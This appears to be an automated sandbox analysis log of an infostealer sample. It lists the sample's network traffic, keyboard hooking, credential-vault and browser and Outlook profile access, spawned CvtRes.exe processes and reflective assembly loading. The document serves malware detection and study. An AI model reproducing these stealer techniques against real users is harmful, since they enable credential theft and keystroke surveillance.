                      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49736 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49737 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49958 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50006 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50007 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50008 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50009 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50010 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50011 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50012 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50013 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50014 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50015 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50016 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50017 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50018 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50019 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50020 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50021 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50022 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50023 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to log keystrokes (.Net Source)
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe.3625b10.4.raw.unpack, SKTzxzsJw.cs.Net Code: aJpDBPK
                      Installs a global keyboard hook
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\CvtRes.exeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe.3625b10.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 2.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe.3625b10.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      .NET source code contains very large strings
                      Source: SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe, Program.csLong String: Length: 73048
                      Source: SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe, Program.csLong String: Length: 320856
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess Stats: CPU usage > 49%
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeCode function: 0_2_009824A80_2_009824A8
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeCode function: 0_2_0098A8250_2_0098A825
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeCode function: 0_2_00982DD00_2_00982DD0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeCode function: 0_2_00980A880_2_00980A88
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeCode function: 0_2_009846500_2_00984650
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeCode function: 0_2_009837910_2_00983791
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeCode function: 0_2_0098A8930_2_0098A893
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeCode function: 0_2_009878F80_2_009878F8
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeCode function: 0_2_009864180_2_00986418
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeCode function: 0_2_0098A8180_2_0098A818
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeCode function: 0_2_009824140_2_00982414
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeCode function: 0_2_0098A8770_2_0098A877
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeCode function: 0_2_009818680_2_00981868
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeCode function: 0_2_009869D00_2_009869D0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeCode function: 0_2_009855C00_2_009855C0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeCode function: 0_2_009869C00_2_009869C0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeCode function: 0_2_0098A6100_2_0098A610
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeCode function: 0_2_0098A6200_2_0098A620
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeCode function: 0_2_00988A680_2_00988A68
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeCode function: 0_2_009867980_2_00986798
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeCode function: 0_2_0098730A0_2_0098730A
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeCode function: 0_2_009873280_2_00987328
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 2_2_0136E3612_2_0136E361
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 2_2_0136AA092_2_0136AA09
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 2_2_01364A682_2_01364A68
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 2_2_01363E502_2_01363E50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 2_2_0136DEE02_2_0136DEE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 2_2_013641982_2_01364198
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 2_2_06A555982_2_06A55598
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 2_2_06A565E02_2_06A565E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 2_2_06A57D682_2_06A57D68
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 2_2_06A5B2102_2_06A5B210
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 2_2_06A530502_2_06A53050
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 2_2_06A5C1782_2_06A5C178
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 2_2_06A576882_2_06A57688
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 2_2_06A55CCB2_2_06A55CCB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 2_2_06A5E3982_2_06A5E398
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 2_2_06A523512_2_06A52351
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 2_2_06A500402_2_06A50040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 2_2_06A500232_2_06A50023
                      Source: SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe, 00000000.00000002.1702725680.0000000002561000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRIDE.dll* vs SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe
                      Source: SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe, 00000000.00000002.1702725680.0000000002586000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename865d6706-75f1-4a91-80df-999fea96c5cd.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe
                      Source: SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe, 00000000.00000002.1702461925.0000000000B00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRIDE.dll* vs SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe
                      Source: SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe, 00000000.00000002.1702021960.000000000075E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe
                      Source: SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe, 00000000.00000000.1688906498.0000000000154000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePO#4100008418.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe
                      Source: SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe, 00000000.00000002.1702812178.0000000003561000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename865d6706-75f1-4a91-80df-999fea96c5cd.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe
                      Source: SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeBinary or memory string: OriginalFilenamePO#4100008418.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe
                      Source: SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe.3625b10.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 2.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe.3625b10.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe.3625b10.4.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe.3625b10.4.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe.3625b10.4.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe.3625b10.4.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe.3625b10.4.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe.3625b10.4.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe.3625b10.4.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe.3625b10.4.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/1@4/2
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe.logJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeMutant created: NULL
                      Source: SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeReversingLabs: Detection: 52%
                      Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe"
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CvtRes.exe"
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CvtRes.exe"
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CvtRes.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CvtRes.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: RIDE.pdb source: SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe, 00000000.00000002.1702725680.0000000002561000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe, 00000000.00000002.1702461925.0000000000B00000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: RIDE.pdb( source: SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe, 00000000.00000002.1702725680.0000000002561000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe, 00000000.00000002.1702461925.0000000000B00000.00000004.08000000.00040000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      .NET source code contains potential unpacker
                      Source: SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe, Program.cs.Net Code: LoadAndExecute System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe.b00000.0.raw.unpack, -Module-.cs.Net Code: _206B_206E_206D_200D_200E_202B_206E_202A_206D_206B_200B_206B_202B_200C_206E_206E_200D_206A_206B_200C_202B_200C_202D_200E_202A_202E_206C_200F_202D_206D_200F_200B_200C_202D_200C_202A_202C_202A_206A_200D_202E System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe.2562424.2.raw.unpack, -Module-.cs.Net Code: _206B_206E_206D_200D_200E_202B_206E_202A_206D_206B_200B_206B_202B_200C_206E_206E_200D_206A_206B_200C_202B_200C_202D_200E_202A_202E_206C_200F_202D_206D_200F_200B_200C_202D_200C_202A_202C_202A_206A_200D_202E System.Reflection.Assembly.Load(byte[])
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 2_2_01360C55 push edi; retf 2_2_01360C7A
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
